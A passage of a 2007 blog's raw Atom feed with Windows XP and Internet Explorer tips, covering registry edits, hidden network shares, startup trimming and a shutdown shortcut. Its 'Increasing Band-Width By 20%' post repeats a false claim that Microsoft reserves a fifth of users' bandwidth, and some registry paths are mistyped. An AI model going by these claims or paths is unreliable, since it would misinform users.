Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=4718859858398904303&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4718859858398904303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4718859858398904303'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/unlock-supersecret-admin-account-in.html' title='Unlock the supersecret Admin account in vista'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-422619213152120965</id><published>2007-09-27T13:39:00.000+10:00</published><updated>2007-10-01T23:33:17.189+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Removing the Recycle Bin from the Desktop:</title><content type='html'>If you don't use the Recycle Bin to store deleted files , you can get rid of its desktop icon all together. Run Regedit and go to:&lt;br /&gt;HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-422619213152120965?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/422619213152120965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=422619213152120965&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/422619213152120965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/422619213152120965'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/removing-recycle-bin-from-desktop.html' title='Removing the Recycle Bin from the Desktop:'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-3390585311277536948</id><published>2007-09-27T13:17:00.001+10:00</published><updated>2007-10-01T23:28:59.303+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Customize Internet Explorer's Title Bar</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Customize Internet Explorer's Title Bar:&lt;br /&gt;Open Registry by going to Start then Run and Enter regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet. Explorer\Main. In right hand panel look for string "Window Title" and change its value to whatever custom text you want to see.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3390585311277536948?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3390585311277536948'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3390585311277536948'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/customize-internet-explorers-title-bar.html' title='Customize Internet Explorer&apos;s Title Bar'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-5362198542039965563</id><published>2007-09-27T13:16:00.000+10:00</published><updated>2007-10-01T23:32:38.928+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Improving the Slow Boot up time:</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;There are a variety of reasons why your windows XP system would boot slowly. Most of the times it this has to do with the startup applications. If you would like to speed up the bootup sequence, consider removing some of the startup applications that you do not need. Easiest way to remove startup apps is through System Configuration Utility. Go to Start then Run and enter MSCONFIG and go to the Startup tab. Deselect/UnCheck application(s) that you do not want to startup at boot time.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-5362198542039965563?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5362198542039965563'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/5362198542039965563'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/improving-slow-boot-up-time.html' title='Improving the Slow Boot up time:'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-583314451080760222</id><published>2007-09-27T13:15:00.000+10:00</published><updated>2007-10-01T23:32:38.928+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Hiding shared folders with $</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;em&gt;&lt;strong&gt;Hiding shared folders with $&lt;br /&gt;If you would like to share a folder so that users on your network can access it easily, but are worried about displaying the folder for anyone to browse through, there is an easy way to render a shared folder invisible but still accessible. From the shared folder dialog: (right click on desired folder\sharing and security\). You can hide a shared folder by simply adding a '$' to the end of the name you give the folder in the 'sharing and security' window. In this way, you can maintain network access to shared folders, while hiding them from prying eyes. To browse to a hidden shared folder from another computer, simply click 'start/run' then type \\(name of the computer the share is on)\(sharename$) and press enter.&lt;/strong&gt;&lt;/em&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-583314451080760222?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/583314451080760222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/583314451080760222'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/hiding-shared-folders-with.html' title='Hiding shared folders with $'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-342399432733071512</id><published>2007-09-27T13:14:00.000+10:00</published><updated>2007-10-01T23:32:38.928+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Removing the Shortcut arrow from Desktop Icons</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Goto Start then Run and Enter regedit. Navigate to HKEY_CLASSES_ROOTlnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-342399432733071512?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/342399432733071512'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/342399432733071512'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/removing-shortcut-arrow-from-desktop.html' title='Removing the Shortcut arrow from Desktop Icons'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4545962793815749050</id><published>2007-09-27T13:13:00.000+10:00</published><updated>2007-10-01T23:49:07.755+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hard Disk OR Drivers'/><title type='text'>To change Drive Letters</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;To change Drive Letters:&lt;br /&gt;Go to Start &gt; Control Panel &gt; Administrative Tools &gt; Computer Management, Disk Management, then right-click the partition whose name you want to change (click in the white area just below the word "Volume") and select "change drive letter and paths." From here you can add, remove or change drive letters and paths to the partition&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4545962793815749050?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4545962793815749050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4545962793815749050'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/to-change-drive-letters.html' title='To change Drive Letters'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4916066204045384762</id><published>2007-09-27T13:06:00.001+10:00</published><updated>2007-10-01T23:32:38.929+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Customize Logon prompt with your Own Words</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Customize Logon prompt with your Own Words:&lt;br /&gt;Open Registry by going to Start then Run, entering regedit and Navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]. In right pane, look for key by the name "LogonPrompt". Set its value to whatever text you want to see displayed at login screen.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4916066204045384762?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4916066204045384762'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4916066204045384762'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/customize-logon-prompt-with-your-own.html' title='Customize Logon prompt with your Own Words'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8075490687643429971</id><published>2007-09-27T13:05:00.001+10:00</published><updated>2007-10-01T23:30:56.158+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Increasing Band-Width By 20%</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Increasing Band-Width By 20%:&lt;br /&gt;Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etcTo get it back:Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:Local Computer Policy then Computer Configuration then Administrative Templates then Network then QOS Packet Scheduler and then to Limit Reservable Bandwidth. Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab i.e."By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%.It works on Win 2000 as well.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8075490687643429971?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8075490687643429971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8075490687643429971'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/increasing-band-width-by-20.html' title='Increasing Band-Width By 20%'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7892155715826629949</id><published>2007-09-27T13:04:00.000+10:00</published><updated>2007-10-01T23:28:59.303+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet Explorer Tips'/><title type='text'>Making Google the Default Search Engine in Internet</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Open registry editor by going to Start then Run and entering regedit and navigate to following three keys separately and change it as shown below:[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] "Search Page"=" &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.google.com/" target="_blank"&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;http://www.google.com&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;""Search Bar"=" &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.google.com/ie" target="_blank"&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;http://www.google.com/ie &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL]""=" &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.google.com/keyword/%25s" target="_blank"&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;http://www.google.com/keyword/%s&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search] "SearchAssistant"=" &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;a onclick="return top.js.OpenExtLink(window,event,this)" href="http://www.google.com/ie" target="_blank"&gt;&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;http://www.google.com/ie&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="font-family:times new roman;font-size:130%;"&gt;&lt;strong&gt;&lt;em&gt;&lt;span style="color:#33ff33;"&gt;" .&lt;/span&gt;&lt;/em&gt;&lt;/strong&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-7892155715826629949?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7892155715826629949'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/7892155715826629949'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/making-google-default-search-engine-in.html' title='Making Google the Default Search Engine in Internet'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-4864889573284156373</id><published>2007-09-27T13:02:00.002+10:00</published><updated>2007-10-01T23:32:38.929+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Force windows XP to reboot upon crashing</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Force windows XP to reboot upon crashing&lt;br /&gt;This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for keeping your system on 24/7:Open REGEDITNavigate to 'HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\CrashControl' Edit the 'AutoReboot' value to '1'&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-4864889573284156373?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4864889573284156373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/4864889573284156373'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/force-windows-xp-to-reboot-upon.html' title='Force windows XP to reboot upon crashing'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6760924027988608807</id><published>2007-09-27T13:02:00.001+10:00</published><updated>2007-10-01T23:32:38.929+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Removing Shared Documents folder From My Computer</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to keyHKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6760924027988608807?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6760924027988608807'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6760924027988608807'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/removing-shared-documents-folder-from.html' title='Removing Shared Documents folder From My Computer'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-6742951342011922534</id><published>2007-09-27T13:00:00.000+10:00</published><updated>2007-10-01T23:32:38.929+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Locking the desktop</title><content type='html'>&lt;span style="font-family:times new roman;font-size:130%;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;If you are leaving your computer for a while and do not wish to turn it off, but want to assure that no-one else can use the computer while you are away, locking the desktop is the best option. By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-6742951342011922534?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6742951342011922534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/6742951342011922534'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/locking-desktop.html' title='Locking the desktop'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8933112763185782514</id><published>2007-09-27T12:59:00.002+10:00</published><updated>2007-10-01T23:32:38.930+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Renaming The Recycle Bin icon:</title><content type='html'>&lt;span style="font-family:times new roman;color:#33ff33;"&gt;&lt;strong&gt;&lt;em&gt;To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E} and change the name "Recycle Bin" to whatever you want (don't type any quotes). &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8933112763185782514?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8933112763185782514/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8933112763185782514&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8933112763185782514'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8933112763185782514'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/renaming-recycle-bin-icon.html' title='Renaming The Recycle Bin icon:'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-8966695452077164690</id><published>2007-09-27T12:59:00.001+10:00</published><updated>2007-10-01T23:32:38.930+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Modify autoplay for different types of CD</title><content type='html'>&lt;span style="font-family:times new roman;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;&lt;br /&gt;Windows XP includes the ability to perform different actions depending on the type of CD you insert into the drive. For example, you could set your system to always respond to CDs containing MP3 files by opening Windows Media Player. To edit the Autoplay properties: Open 'my computer'. Right click on the drive you wish to set and select 'properties.' Choose the autoplay tab. Use the dropdown box to see the various recognized types of CD and choose appropriate actions for them.&lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-8966695452077164690?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/8966695452077164690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=8966695452077164690&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8966695452077164690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/8966695452077164690'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/modify-autoplay-for-different-types-of.html' title='Modify autoplay for different types of CD'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-2199301667675123715</id><published>2007-09-27T12:58:00.001+10:00</published><updated>2007-10-01T23:32:38.930+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop Tips'/><title type='text'>Creating Shutdown Icon or One Click Shutdown</title><content type='html'>&lt;span style="font-family:times new roman;color:#ffffff;"&gt;&lt;strong&gt;&lt;em&gt;Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path. Use this path in "Type Location of the Item"SHUTDOWN -s -t 01If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done. &lt;/em&gt;&lt;/strong&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-2199301667675123715?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/2199301667675123715/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=2199301667675123715&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2199301667675123715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/2199301667675123715'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2007/09/creating-shutdown-icon-or-one-click.html' title='Creating Shutdown Icon or One Click Shutdown'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-332245704614797979</id><published>2007-09-27T12:55:00.000+10:00</published><updated>2007-10-01T23:32:38.931+10:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP Desktop 